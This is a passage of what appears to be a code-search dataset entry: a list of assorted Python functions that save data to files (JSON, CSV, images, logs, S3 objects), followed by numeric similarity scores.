test not implemented.\n outstring += \"unknown\" + ss # false central breakup.\n print >> fpout, outstring\n fpout.close()\n return 1", "def writehalos(self, snapshot, halos, hubble=None, outfile=None):\n s = snapshot\n grpoutfile = s.filename + \".amiga.grp\"\n statoutfile = s.filename + \".amiga.stat\"\n tipsyoutfile = s.filename + \".amiga.gtp\"\n halos.writegrp(s, halos, grpoutfile)\n halos.writestat(s, halos, statoutfile, hubble=hubble)\n shalos = halos.writetipsy(s, halos, tipsyoutfile, hubble=hubble)\n return shalos", "def dump(self, filename, mode='w', rebox=False):\n from os import path\n filepath = path.abspath(path.expanduser(filename))\n if mode == 'w':\n open(filepath, 'w').close() \n for t, ts in self:\n ts.dump(filename, rebox=rebox)", "def save_file(map_, args): \n if args.segments:\n p = os.path.join(args.res_dir, 'compression_'+args.db+\"_seg\")\n else:\n p = os.path.join(args.res_dir, 'compression_'+args.db)\n with open(p, 'w') as f:\n for file in map_:\n f.write(\"{} {}\\n\".format(file, map_[file]))", "def snapshot(self, filename=None):\n if filename:\n self.command(\"snapshot %(filename)s\" % locals())\n else:\n self.command(\"snapshot\")", "def test_16_0_saveToFile(self):\n\n Rectangle.save_to_file([self.r1, self.r2])\n self.assertTrue(os.path.isfile(\"Rectangle.json\"))", "def save_meta_file(gen_dict, f_name):\r\n logger = custom_logger.CustomLogger(run_id+':'+file_id)\r\n filename = run_id+'_'+ f_name +'.meta'\r\n f = open(os.path.join(unique_op_dir, filename),'a')\r\n print('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n logger.info('Output stored in %s'%(str(os.path.join(unique_op_dir, filename))))\r\n for key, val in gen_dict.items():\r\n line = str(key)+\" : \"+str(val)+\"\\n\"\r\n f.write(line)", "def file_output(matches: list, output_file_name: str = 'matches.txt'):\n with open(\"test/Matches/\" + output_file_name, 'w') as f:\n for match in matches:\n for event in match.events:\n f.write(\"%s\\n\" % event.payload)\n f.write(\"\\n\")", "def write_to_file(info: List[str]) -> None:\n return", "def write_to_file(self, filepath, mode = \"a\"): \n if \"r\" in mode: \n print(\"Only accepts write and append modes\")\n return \n with open(filepath, mode) as f: \n f.write(\"{}\\n\".format(self.title))\n verified, seen, ratio = self.get_verified_ratio()\n f.write(\"Verified Names: {}\\n\".format(str(verified)))\n f.write(\"Names: {}\\n\".format(str(seen)))\n f.write(\"Ratio: {}\\n\".format(str(ratio)))", "def save_graph(self, widget, data=None):\n\t\t#un po' di pulizia prima di fare il salvataggio\n\t\tos.system(\"find ./extra/MonitorGraph/ -type f -not -name '*.png' | xargs rm -f\")\n\t\tsnapshotFile =\"./extra/UserOutput/Snapshot\"+time.strftime(\"%Y%m%d-%H%M\", time.gmtime())+\".tar\"\n\t\tos.system(\"tar -cf \"+snapshotFile+\" --exclude def* --directory ./extra/ MonitorGraph/\")\n\t\tprint \"Snapshot saved to\",snapshotFile", "def write_file(self, filename, contents):\n blob = self.repo.create_blob(contents)\n self.index.add(pygit2.IndexEntry(filename, blob, pygit2.GIT_FILEMODE_BLOB))", "def writeFile(fileName, profile, singleScores, bestMotifs, dnaScores, bestMotif):\n with open(fileName, 'w+') as f:\n f.write(strftime(\"Created on: %Y-%m-%d %H:%M:%S\\n\", localtime()))\n f.write('Best Motifs: ')\n f.write('\\n')\n json.dump(bestMotif, f)\n f.write('\\n')\n f.write('Motifs Profile: ')\n f.write('\\n')\n json.dump(profile, f)\n f.write('\\n')\n f.write('Single Scores: ')\n f.write('\\n')\n for i in range(0, len(singleScores)):\n 
json.dump(bestMotifs[i], f)\n f.write(': ')\n json.dump(singleScores[i], f)\n f.write('\\n')\n f.write('Motifs that have a better score than the worst scoring one: ')\n f.write('\\n')\n for scores in dnaScores:\n json.dump(scores, f)\n f.write('\\n')", "def write_file(self, filename, fileformat=\"json\"):\n if self.df_avg is None:\n self.collect_stats()\n if fileformat == \"json\":\n self.write_json(filename)\n elif fileformat == \"excel\":\n self.write_excel(filename)", "def filewrite(self, filename):\n io.write(self, filename)", "def write_info_to_file(self):\n\n self.info.write_mission_info()\n\n self.logger.info(\"Mission instance write succeeded.\")", "def write_file(*args, **kwargs): # real signature unknown\n pass", "def write_file(self):\n if self._write_file == None:\n return\n\n try:\n out = file(self._write_file, \"w\")\n except IOError, e:\n print e\n sys.exit(1)\n out.writelines(\"A cases\") \n out.close()", "def write_results(detections, filename):\n start = time.time()\n\n boxes, labels, scores = detections\n with PathManager.open(filename, \"w\") as f:\n for key in boxes.keys():\n for box, label, score in zip(boxes[key], labels[key], scores[key]):\n f.write(\n \"%s,%.03f,%.03f,%.03f,%.03f,%d,%.04f\\n\"\n % (key, box[1], box[0], box[3], box[2], label, score)\n )\n\n logger.info(\"AVA results wrote to %s\" % filename)\n logger.info(\"\\ttook %d seconds.\" % (time.time() - start))", "def save(self, fn: str) -> None:\n fout = open(fn, 'w')\n for t,x in zip(self.times,self.milestones):\n fout.write('%f\\t%d '%(t,len(x)))\n fout.write(' '.join([str(xi) for xi in x]))\n fout.write('\\n')\n fout.close()", "def to_file(self, filename=None):\n name = None\n if filename is not None:\n name = filename\n elif self.name:\n name = self.name\n\n if name:\n #f = open(self.name, 'w')\n f = codecs.open(name, 'w', encoding='utf-8')\n self.seek(0)\n f.write(self.read())\n f.close()\n else:\n print \"No log_name for this log\"", "def store(self, filename):", "def write(self):\n f, ds = self.opendset()\n #\n # Now add the images\n #\n start_time = time.clock() # time this\n nframes = 0 # number completed\n print_every = 1; marker = \" .\";\n print('Frames written (of %s):' % self.ntowrite, end=\"\")\n for i in range(self.nfiles):\n if nframes >= self.ntowrite: break\n\n logging.debug('processing file %d of %d' % (i+1, self.nfiles))\n img_i = fabio.open(self.files[i])\n nfi = img_i.nframes\n for j in range(nfi):\n msg = '... file %d/image %d' % (i, j)\n logging.debug(msg)\n if j < self.nempty:\n logging.debug('... empty frame ... skipping')\n else:\n ds[nframes, :, :] = img_i.data\n nframes += 1\n if numpy.mod(nframes, print_every) == 0:\n print(marker, nframes, end=\"\")\n print_every *= 2\n sys.stdout.flush()\n logging.debug('... 
wrote image %s of %s' %\\\n (nframes, self.ntowrite))\n if nframes >= self.ntowrite:\n logging.debug('wrote last frame: stopping')\n break\n if j < nfi - 1:\n # on last frame in file, fabio will look for next file\n img_i = img_i.next()\n\n f.close()\n print(\"\\nTime to write: %f seconds \" %(time.clock()-start_time))", "def save_quickstreams(quickstreams):\n with open('quickstreams.txt', 'w') as f:\n json.dump(quickstreams, f, indent=4)", "def write_image(out, frame):\n if not os.path.exists(out):\n os.makedirs(out)\n now = datetime.now() \n dt_string = now.strftime(\"%H-%M-%S-%f\") \n filename = f'{out}/{dt_string}.png'\n logging.info(f'write image {filename}')\n cv2.imwrite(filename, frame)", "def __write_measurement(self, measurement):\n with self.__filename.open(mode='a') as history_file:\n history_file.write(measurement + '\\n')", "def write_output_file(self, index):\n ctx = self.block_store.make_local_output(self.expected_outputs[index])\n self.open_output_contexts[index] = ctx\n return ctx.get_filename()", "def _toFile(self):\n pass", "def write(self, outfile):\n outfile.write(\n '\\t'.join(\n [\n str(i) for i in [\n self.chrom, self.start, self.end, self.name,\n self.count, self.fold_change, self.log10p\n ]\n ]\n )\n )\n outfile.write('\\n')", "def writefile():\n\n print(\"Writing to file...\")\n\n # Open the heartbeat file in append mode and save the current time.\n with open(settings.ROOT_DIR + \"/heartbeat\", \"a\") as f:\n f.write(str(time()))", "def saveToFile(html):\n #print(\"Saving to file.\")\n html += \"\\n\"\n #open necessary files to save\n logFile = open(\"postLog_{0}_{1}.txt\".format(os.path.splitext(path)[0], dateTimeNow), \"a\")\n logFile.write(html)\n logFile.close()\n #print(\"Check Point.\")", "def save_outputs(d, dst_dir, site, file_format='json', write_mode='w'):\n \n \n min_date_str = str(min([pd.Timestamp(x) for x in d.keys()]).date())\n max_date_str = str(max([pd.Timestamp(x) for x in d.keys()]).date())\n fn = '_'.join([site, min_date_str, max_date_str]) + '.' 
+ file_format\n dst = os.path.join(dst_dir, fn)\n with open(dst, write_mode) as f:\n if (file_format == 'json') & (write_mode =='w'):\n json.dump(d, f)\n elif (file_format == 'pkl') & (write_mode == 'wb'):\n pickle.dump(d, f)\n else:\n raise ValueError(\"File format or write mode incorrect.\\nOptions are 1) 'json', 'w' and 2) 'pkl', 'wb'\")", "def write_backup_file(backup_file, backup_data):\n\n fp = open(backup_file, mode=\"w\")\n\n for record in backup_data.values():\n json_str = json.dumps(record)\n fp.write(json_str)\n fp.write(\"\\n\")\n\n fp.close()", "def write_file(self):\n rl_df, lift_df = self.create_df()\n\n number = re.findall('\\d+', self.url)[0]\n\n if self.write is True:\n with open('house_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file:\n rl_df.to_csv(file, sep=';')\n with open('house_lifts_{}.csv'.format(number), 'w',\n encoding='utf-8-sig') as file2:\n lift_df.to_csv(file2, sep=';')", "def save_meta(self):\n # jOut = os.path.join(self.meta[\"wdir\"], meta_file)\n with open(self.meta_filepath, \"w\") as f:\n json.dump(self.meta, f)", "def save(self,outPath=None):\n if (not self.canSave): raise StateError(_(\"Insufficient data to write file.\"))\n if not outPath:\n fileInfo = self.fileInfo\n outPath = os.path.join(fileInfo.dir,fileInfo.name)\n out = file(outPath,'wb')\n #--Tes3 Record\n self.tes3.setChanged()\n self.tes3.hedr.setChanged()\n self.tes3.hedr.numRecords = len(self.records) #--numRecords AFTER TES3 record\n self.tes3.getSize()\n self.tes3.dump(out)\n #--Other Records\n for record in self.records:\n record.getSize()\n record.dump(out)\n out.close()", "def write_to_file(self, papers, filename):\n\t\tpass", "def write_the_contents_to_the_same_file(self):\n if not len(self.student_list):\n print('There is no contents to write')\n return\n\n if self._filename is None:\n self._filename = self.input_filename()\n\n with open(self._filename, 'w') as OUT:\n OUT.write(self.student_list.to_csv(date_format='%Y-%m-%d',\n sep='\\t', header=False, columns=self.columns_to_save))\n print(f'Data are saved into {self._filename!r}')", "def write(self, filename):\n\n self.__image.save(filename)", "def save(self, fname, snver=None):\n self._io.save(fname)", "def write_to_file(fib_details: dict):\n pass # TODO: Replace with implementation!", "def write_to_file(start_runtime, contents, write_mode='a'):\n with open(f\"{start_runtime}.txt\", write_mode) as f:\n f.write(\"Filename\\t\\tMaxTrack\\tNumInst\\t\\tTimeSig\\t\\tTPB\\n\")\n f.write(contents)", "def write_to_file(self, filename):\n self.octree.write(str.encode(filename))\n print(\"Save octomap to \"+filename)", "def write_to_file(self, file, content):\n with open(file, 'a') as report_file:\n report_file.write('{}\\n'.format(content))", "def log_event_to_file(event):\n with open('eventlogs/{}.json'.format(time.time()), 'w') as event_write:\n event_write.write(json_dumpstring(event))\n pass", "def write_thumbnails(self, appstruct):\n slugser = slugify(appstruct[\"serial\"])\n pdf_filename = \"thumbnails/%s/uploaded.pdf\" % slugser\n top_file = \"thumbnails/%s/top.png\" % slugser\n mos_file = \"thumbnails/%s/mosaic.png\" % slugser\n \n thumg = ThumbnailGenerator(pdf_filename)\n self.save_blob(thumg.top_thumbnail(), top_file)\n self.save_blob(thumg.mosaic_thumbnail(), mos_file)", "def write(self):\n # # Sometimes file is not written properly. 
So delete and rewrite it\n # os.system('rm {}'.format(snip_dir + '/' + self.name))\n # if 'NUM_TIME_STEPS' not in self.define.keys():\n # warnings.warn('NUM_TIME_STEPS missing in header. Execution may hang!')\n with open(snip_dir + '/' + self.name, 'w') as f:\n f.write('/* Temporary generated file for snip process definitions before compilation */\\n')\n f.write(self.__str__())\n\n # os.system('ls {}'.format(snip_dir + '/' + self.name))", "def save(self, filename):\n o = open(filename, 'w')\n o.write(self.write())\n o.close()", "def save(self, f):\n self.f = f\n for region in self.regions:\n ext = region.address & 0xFFFF0000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address = region.address - ext\n for chunk in chunks(region.data):\n if address >= 0x10000:\n ext += 0x10000\n self.write_hex_line(\n HexLine(0, EXTLINADR, struct.pack(\">H\", ext >> 16))\n )\n address -= 0x10000\n self.write_hex_line(HexLine(address, DATA, chunk))\n address += len(chunk)\n self.write_hex_line(HexLine(0, EOF))", "def write_hashes(filename):\n\n [head, tail] = os.path.split(filename)\n new_filename = f\"{head}/hashed-{tail}\"\n\n shutil.copy(filename, new_filename)\n\n with open(filename) as in_file:\n data = json.loads(in_file.read())\n\n click.echo(f\"Event ID: {data['event_id']}\")\n click.echo(\"Writing span hashes\")\n\n config = load_span_grouping_config({\"id\": DEFAULT_CONFIG_ID})\n results = config.execute_strategy(data)\n\n with open(new_filename, \"w\") as out_file:\n results.write_to_event(data)\n out_file.write(json.dumps(data, indent=4))\n\n click.echo(\"Done\")\n click.echo(\"\\n\")", "def write_map_to_file(dir, version, role, map_id, d):\n if not os.path.exists(dir):\n os.makedirs(dir)\n path = build_output_file_path(dir, version, role, map_id)\n with open(path, \"w\") as f:\n json.dump(d, f, sort_keys=True, indent=4)\n f.close()", "def write_output_shifts_to_file(self, shift_output):\n pass", "def store_action_log(self, filename):\n t = self.get_current_timeindex()\n camera_obs = self.get_camera_observation(t)\n self._action_log[\"final_object_pose\"] = {\n \"t\": t,\n \"pose\": camera_obs.object_pose,\n }\n\n with open(filename, \"wb\") as fh:\n pickle.dump(self._action_log, fh)", "def write_state_file(self, state):\r\n with open(StudentModuleHistoryCleaner.STATE_FILE, \"w\") as state_file:\r\n state_file.write(state)", "def GenerateRevisionFile(self):\n\n print 'Saving revision to %s' % self.revisions_path\n Write(\n self.revisions_path,\n ('{\"chromium_revision\":%d, \"webkit_revision\":%d, '\n '\"v8_revision\":%d}') % (self._chromium_revision,\n self._webkit_revision,\n self._v8_revision))", "def write_md_file(sip_uuid, filepath):\n sip = SIP.objects.get(pk=sip_uuid)\n md_object = load_file_data_from_db(sip, filepath)\n convert_md_object = json.dumps(\n md_object, sort_keys=True, ensure_ascii=False, indent=4\n )\n filename = os.path.join(filepath, \"metadata_output.json\")\n with open(filename, \"wb\") as f:\n f.write(six.ensure_binary(convert_md_object))", "def write_run(run):\n r=Run(run)\n r.write_all()", "def saveUsage(self, filePath):\n message = time.strftime('%c') + ' : '\n for spot in self.getParkingSpots():\n message += str(spot.id) + ', ' + spot.status + '; '\n with open(filePath, 'a+') as outfile:\n outfile.write(message + '\\n')\n pass", "def save(self, path, alignment, positions):\n path = path[7:]\n if path[-5:] != \".json\":\n path += \".json\"\n if path[0] == \"/\" and path[2] == \":\":\n path = path[1:] # Windows fix\n with 
open(path, \"w\") as outfile:\n value = {\n \"angleCommand\": self._angle_command,\n \"horizontalCommand\": self._horizontal_command,\n \"verticalCommand\": self._vertical_command,\n \"origin\": self._origin,\n \"frameWidth\": self._frame_width,\n \"frameHeight\": self._frame_height,\n \"runs\": [r.to_json() for r in self._runs],\n \"alignment\": alignment.to_dict(),\n \"positions\": positions.to_dict()\n }\n json.dump(value, outfile)", "def write_to_file(entry, file):\n with open(file, \"a\") as f:\n f.write(entry)", "def _file_writer(self, lines, filename):\n if self.MockRun:\n return\n\n if self.Verbose:\n print \"Writing file %s\" % filename\n\n updated_file = open(filename, 'w')\n updated_file.write(''.join(lines))\n updated_file.close()", "def write_file(self, contents):\n fd = open(os.path.join(os.path.dirname(__file__),\n 'data', 'test.html'), 'w')\n fd.write(contents)\n fd.close()", "def write_to_file(inventory):\n env = Environment(loader=FileSystemLoader('templates'), trim_blocks=True)\n output_template = env.get_template('output.j2')\n # create and clean an 'outputs' folder\n path = \"./outputs\"\n try:\n shutil.rmtree(path, ignore_errors = True, onerror = None)\n except:\n print('Error while deleting directory')\n os.mkdir(path)\n os.chdir(path)\n for node, node_data in inventory.items():\n if 'outputs' in node_data:\n os.mkdir(node)\n for command, output in node_data['outputs'].items():\n # when creating filenames based on command, swap 'spaces' with 'underscores':\n command = re.sub(r\"\\s\", r\"_\", command)\n open(f\"{node}/{command}.txt\", 'a').write(\n output_template.render(node=node, data=output))\n print(\"\\n\" + f\"Job complete. If data gathering was successful, see 'outputs' directory.\")\n return inventory", "def write_jobfile(self, copyfiles):\n with open(self.options.jobfile, 'w') as fd:\n fd.write(json.dumps(copyfiles, indent=2))", "def save_features_to_file(self):\n if not os.path.exists(self.features_save_path):\n os.makedirs(self.features_save_path)\n for s in self.sets:\n self.save_features_to_file_by_set(s)", "def write_s3_file(data, date):\n logger.info(\"Writing history file to S3.\")\n bucket = os.getenv(\"SPOTIFY_BUCKET_NAME\")\n path = os.getenv(\"SPOTIFY_BUCKET_PATH\")\n s3 = boto3.client('s3')\n data = json.dumps(data)\n s3.put_object(Bucket=bucket, Key=\"%s/%s.json\" % (path, date), Body=data)", "def write_image(self, filename):\n cv2.imwrite(filename, self.image)", "def write(self, filename, data):\n raise NotImplementedError", "def write(self, file):\n pos = file.tell()\n pickle.dump((self.index, self.meta, self.info), file)\n file.seek(0)\n\n # update the header with the position of the content index.\n file.write(struct.pack('<Q', pos))", "def _write(self, filename, data):\n fullpath = os.path.join(self._tempdir, filename)\n with open(fullpath, 'w') as ofile:\n json.dump(data, ofile)\n return fullpath", "def write(self, filename, mode=\"w\"):\n d = self._result_dict\n val = yaml.safe_dump(d, default_flow_style=False)\n\n with open(str(filename), mode) as outfile:\n outfile.write(val)", "def _write_file(output_path: str, file_content: Iterable[str]) -> None:\n with open(output_path, \"w+\", encoding=\"utf-8\") as f:\n f.writelines(file_content)\n\n logging.info(f\"wrote to '{output_path}'\")", "def write_file_set(self, write_file):\n self._write_file = write_file", "def writeAlltoFile(self):\n with open(self._fname, 'w') as f:\n for elem in self.getAll():\n line = self._writeGratoLine(elem)\n f.write(line + \"\\n\")\n f.close()", "def 
fileWrite(content):\n file = open('./result.txt', 'w')\n file.write(content)\n file.close()", "def writeOut(self):\n # import time\n self.outHeader = self.srcHeader\n for line in self.outHeader:\n self.outFile.write(line + '\\n')\n # now = time.asctime(time.localtime(time.time()))\n # self.outFile.write('%% -- %s -- Written to new alog' % now)\n for time_s in sorted(self.outData):\n for sens in self.outData[time_s]:\n for meas in self.outData[time_s][sens]:\n valu = self.outData[time_s][sens][meas]\n msg_list = [str(time_s), meas, sens, str(valu)]\n line_string = reconstructLine(msg_list)\n self.outFile.write(line_string + '\\n')", "def take_snapshot():\n df = scrape()\n for i in df.index:\n single = df.loc[i]\n # create or get locations\n loc, created = Location.objects.get_or_create(\n name=single['Location'],\n all_stands=single['Stands'],\n coordinates=single['Coords']\n )\n # add a new snapshot\n obj = Snapshot(\n location=loc,\n avail_bikes=single['Bikes'],\n free_stands=single['Free stands'],\n timestamp=datetime.now(tz=timezone('Europe/Warsaw'))\n )\n obj.save()", "def write_checkpoint(self):\n self.file_checkpoint_data = open(self.path_checkpoint, \"a+\")\n array_to_write = [str(self.radious), self.type_feature, self.type_filtering, self.h_filterig]\n self.file_checkpoint_data.write(','.join(array_to_write) + \"\\n\")\n self.file_checkpoint_data.flush()", "def write_to(self, filename):\n with open(filename, 'w') as f:\n for xx, yy in zip(self.x, self.y):\n f.write(\"%s %s\\n\" % (xx, yy))\n logger.info(\"Written locations into file {0}\".format(filename))", "def write_xyz_file(allxyz):\n if SAVEXYZ:\n print('+> Saving riverbed topography file...', end='')\n if MODE == 1:\n np.savetxt('kinoshita_topo.xyz', allxyz, fmt='%.6e')\n elif MODE == 2:\n np.savetxt(FNAME.rsplit('.', 1)[0] + '_topo.xyz', allxyz, fmt='%.6e')\n print(' [done]')", "def write(self, filename, *args, **kwargs):\n self.to_fits().writeto(filename, *args, **kwargs)", "def save(self, inst):\n n = inst.dimensions[\"n\"]\n with open(self.location, \"wt\") as f:\n f.write(f\"measurements: {n}\\n\")\n f.write(f\"time temperature\\n\")\n for time, temp in zip(inst.time, inst.temperature):\n f.write(f\"{time:4} {temp:12}\\n\")", "def save_as(self, filename):\n opencv.imwrite(filename, self.img)", "def log_to_file(text, status='INFO'):\n outfile = open(LogName, 'a')\n outfile.write(timestamp()+' - '+status+' - '+str(text)+'\\n')\n outfile.close()" ]
[ "0.7562754", "0.743017", "0.65671015", "0.65112525", "0.64657086", "0.64657086", "0.6451764", "0.64466846", "0.6253342", "0.617585", "0.612374", "0.61043537", "0.60520536", "0.6024088", "0.6023335", "0.6000197", "0.59535676", "0.58751094", "0.58477306", "0.5843929", "0.58373475", "0.58362603", "0.5787403", "0.57794976", "0.57612395", "0.57568026", "0.5736809", "0.57268786", "0.5725884", "0.5718465", "0.5707559", "0.57068634", "0.57051593", "0.5701365", "0.5695726", "0.5692383", "0.5671681", "0.56697845", "0.5668952", "0.56333035", "0.56287324", "0.5622316", "0.55949354", "0.55928165", "0.5591611", "0.55842584", "0.5580846", "0.55775553", "0.55746657", "0.55710274", "0.55685514", "0.5568485", "0.5563695", "0.5558654", "0.5551221", "0.5549031", "0.5548754", "0.5541194", "0.5540035", "0.55400306", "0.55246824", "0.55188715", "0.5510329", "0.55068064", "0.5505558", "0.5502339", "0.5501603", "0.55009997", "0.5489955", "0.5486651", "0.5478949", "0.5477387", "0.5476911", "0.54641855", "0.54568875", "0.5454869", "0.5453928", "0.5453023", "0.54456866", "0.54424787", "0.54385954", "0.5437192", "0.54368", "0.54329026", "0.5427637", "0.5419708", "0.54187787", "0.5418108", "0.54150265", "0.5412744", "0.5411617", "0.54024976", "0.5402494", "0.54017276", "0.53987134", "0.53948605", "0.5394765", "0.5394127", "0.5392206", "0.53852654" ]
0.6254951
8
Write snapshots to file
def generateInfoInstances(regions): print "Writing instances info to output file %s" % instances_data_output_file with open(instances_data_output_file, 'w') as f3: f3.write("INSTANCES\n") f3.write("Name\tinstance ID\tKEEP-tag\tproduction\tinstance_type\tstate\tlaunched\tsecurity_groups\tregion\n\n") for region in regions: print "." # feedback for user instances = getInstances(region) for i in instances: f3.write("%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (get_name_tag(i), i.id, getKeepTag(i), isProduction(i), i.instance_type, i.state, i.launch_time, getGroups(i), i.region.name))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write_snapshot(self):\n json.dump(self.snapshot, open(paths.RESULTS_FILE, 'w'), indent=4, sort_keys=True)", "def saveSnapshot(self, filename): \n\t\tpass", "def write_to_file(self, filename: str) -> None:", "def save_snapshot(args):\n html_doc = document.Document(get_code(args.file))\n info = html_doc.save(args.message, date=args.edition, region=args.region)\n if info is None:\n print('Duplicate snapshot. No snapshot saved.')\n else:\n print('Snapshot saved for {:s} {:%B %d, %Y}. '.format(info[2].capitalize(), info[3]) +\n '{0!r:} - {1:%B} {1.day:2}, {1:%Y %l:%M:%S.%f %p}'.format(info[0], info[1]))", "def write(self, filename):\n pass", "def write(self, filename):\n pass", "def write_snapshots_single_file(dynGraph: DynGraphSN, outputFile: str,both_directions=False):\n f = open(outputFile,\"w\")\n allGraphs = dynGraph.snapshots()\n for t,g in allGraphs.items():\n for e in g.edges():\n weights=\" \"+str(1)\n f.write(str(t)+\" \"+str(e[0])+\" \"+str(e[1])+weights+\"\\n\")\n if both_directions:\n f.write(str(t) + \" \" + str(e[1]) + \" \" + str(e[0]) + weights + \"\\n\")\n f.close()", "def _write(self, schema, writer, snapshots):\n encoder = self.serializer\n doc = {\n META_SCHEMA: [encoder.serialize_column(c) for c in schema],\n META_SNAPSHOTS: [encoder.serialize_snapshot(s) for s in snapshots],\n META_ROWCOUNT: writer.row_counter,\n META_PRIMARYKEY: self._primary_key\n }\n with open(self.tmpmetafile, 'w') as f:\n json.dump(doc, f, cls=self.encoder)\n # Close the archive writer.\n writer.close()\n # Replace existing files with temporary files for new archive version.\n # This is the point of no return.\n # TODO: Instead of moving files we could delete (or keep) previous\n # files as backup.\n shutil.move(src=self.tmpmetafile, dst=self.metafile)\n shutil.move(src=self.tmpdatafile, dst=self.datafile)", "def generateInfoSnapshots(regions):\n print \"Writing snapshots info to output file %s\" % snapshots_data_output_file\n snapshots = []\n for r in regions:\n snapshots += getSnapshotsD(r)\n print \".\" # feedback for the user\n with open(snapshots_data_output_file, 'w') as f2:\n f2.write(\"SNAPSHOTS\\n\")\n f2.write(\n \"Name\\tsnapshot_id\\tKEEP-tag_of_snapshot\\tKEEP-tag_of_AMI\\tproduction?\\tassociated_AMI\\tstart_time\\tstatus\"\n \"\\tregion\\tprogress\\tassociated_volume\\tvolume_size\\tdescription\\n\\n\")\n for s in snapshots:\n f2.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (s['Name'], s['id'], s['KEEP-tag'], s['AMI_KEEP-tags'], s['PROD'], s['AMI(s)'], s['start_time'],\n s['status'], s['region'], s['progress'], s['volume_id'], s['volume_size'], s['Description']))", "def save_snapshot(snapshot_id):\n\n if comm is not None:\n comm.barrier() # if parallel, ensure that we are always in sync, so snapshots are always a consistent set\n\n if ns_args['snapshot_per_parallel_task']:\n rank_id = \"%d\" % rank\n else:\n rank_id = \"ALL\"\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n try:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%s.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n except:\n snapshot_io = open(ns_args['out_file_prefix']+'snapshot.%d.%s.%s' % (snapshot_id, rank_id, ns_args['config_file_format']), \"w\")\n\n root_walkers_write_t0 = time.time()\n for at in walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"root walkers write time \", time.time() - root_walkers_write_t0\n\n if not 
ns_args['snapshot_per_parallel_task']:\n if comm is not None: # gather other walkers to do I/O on master task\n if rank == 0: # I/O on master task\n for r in range(1,size):\n remote_walkers_recv_t0 = time.time()\n remote_walkers = comm.recv(source=r, tag=2)\n print \"save_snapshot remote walkers recv time \", r, time.time() - remote_walkers_recv_t0\n remote_walkers_write_t0 = time.time()\n for at in remote_walkers:\n at.info['volume'] = at.get_volume()\n at.info['iter']=snapshot_id\n ase.io.write(snapshot_io, at, format=ns_args['config_file_format'])\n print \"save_snapshot remote walkers write time \", r, time.time() - remote_walkers_write_t0\n else: # not master task\n comm.send(walkers, dest=0, tag=2)\n\n if ns_args['snapshot_per_parallel_task'] or rank == 0:\n snapshot_io.close()", "def write(self, outfile, rebasings=None):\r\n raise NotImplementedError()", "async def snapshots(secspy, cameras):\n _LOGGER.info(\"SAVE SNAPSHOTS:\")\n\n for camera in cameras:\n filename = f\"snapshot_{camera}.jpg\"\n image = await secspy.get_snapshot_image(camera)\n with open(filename, \"wb\") as img_file:\n _LOGGER.info(f\"Writing snapshot {filename}\")\n img_file.write(image)\n time.sleep(1)", "def saveStatsFile(self):\n if not os.path.exists(\"stats\"):\n os.mkdir(\"stats\")\n now = datetime.datetime.now()\n parts = [now.year, now.month, now.day]\n parts = [\"%02d\"%x for x in parts]\n todaysFileName = \"-\".join(parts)+\".txt\" \n timeStamp = time.strftime(\"%y%m%d%H%M\", time.localtime())\n log = \",\".join(self.logLinesStats)\n fname = \"stats/\"+todaysFileName\n with open(fname, 'a') as f:\n f.write(timeStamp+\",\"+log+\"\\n\")\n self.log(\"wrote \"+fname)", "def _write(self):\n\n output_path = os.path.join(config.S3_OUTPUT, config.DATAFRAME_ARTISTS)\n dataframe = self._cache.get_source(config.DATAFRAME_ARTISTS)\n\n print('Writing dataframe to {}'.format(output_path))\n\n dataframe.write.parquet(\n output_path,\n mode='overwrite'\n )", "def write_snapshots(dynGraph:DynGraphSN, outputDir:str, format:str=None):\n if format==None:\n format=\"edges\"\n allGraphs = dynGraph.snapshots()\n for g in allGraphs:\n _write_network_file(allGraphs[g],os.path.join(outputDir,str(g)),out_format=format)", "def write(self, filename): # real signature unknown; restored from __doc__\n pass", "def write(self, fname):\n pass", "def writestat(self, snapshot, halos, statoutfile, hubble=None):\n s = snapshot\n mindarkmass = min(s.dark['mass'])\n\n if hubble is None:\n hubble = s.properties['h']\n\n outfile = statoutfile\n logger.info(\"Writing stat file to %s\" % statoutfile)\n fpout = open(outfile, \"w\")\n header = \"#Grp N_tot N_gas N_star N_dark Mvir(M_sol) Rvir(kpc) GasMass(M_sol) StarMass(M_sol) DarkMass(M_sol) V_max R@V_max VelDisp Xc Yc Zc VXc VYc VZc Contam Satellite? False? ID_A\"\n print >> fpout, header\n nhalos = halos._nhalos\n for ii in xrange(nhalos):\n h = halos[ii + 1].properties # halo index starts with 1 not 0\n # 'Contaminated'? 
means multiple dark matter particle masses in halo)\"\n icontam = np.where(halos[ii + 1].dark['mass'] > mindarkmass)\n if (len(icontam[0]) > 0):\n contam = \"contam\"\n else:\n contam = \"clean\"\n # may want to add implement satellite test and false central\n # breakup test.\n\n n_dark = h['npart'] - h['n_gas'] - h['n_star']\n M_dark = h['mass'] - h['M_gas'] - h['M_star']\n ss = \" \" # can adjust column spacing\n outstring = str(int(h['halo_id'])) + ss\n outstring += str(int(h['npart'])) + ss + str(int(h['n_gas'])) + ss\n outstring += str(int(h['n_star'])) + ss + str(int(n_dark)) + ss\n outstring += str(h['mass'] / hubble) + ss + \\\n str(h['Rvir'] / hubble) + ss\n outstring += str(h['M_gas'] / hubble) + ss + \\\n str(h['M_star'] / hubble) + ss\n outstring += str(M_dark / hubble) + ss\n outstring += str(h['Vmax']) + ss + str(h['Rmax'] / hubble) + ss\n outstring += str(h['sigV']) + ss\n # pos: convert kpc/h to mpc (no h).\n outstring += str(h['Xc'] / hubble / 1000.) + ss\n outstring += str(h['Yc'] / hubble / 1000.) + ss\n outstring += str(h['Zc'] / hubble / 1000.) + ss\n outstring += str(h['VXc']) + ss + \\\n str(h['VYc']) + ss + str(h['VZc']) + ss\n outstring += contam + ss\n outstring += \"unknown\" + \\\n ss # unknown means sat. test not implemented.\n outstring += \"unknown\" + ss # false central breakup.\n 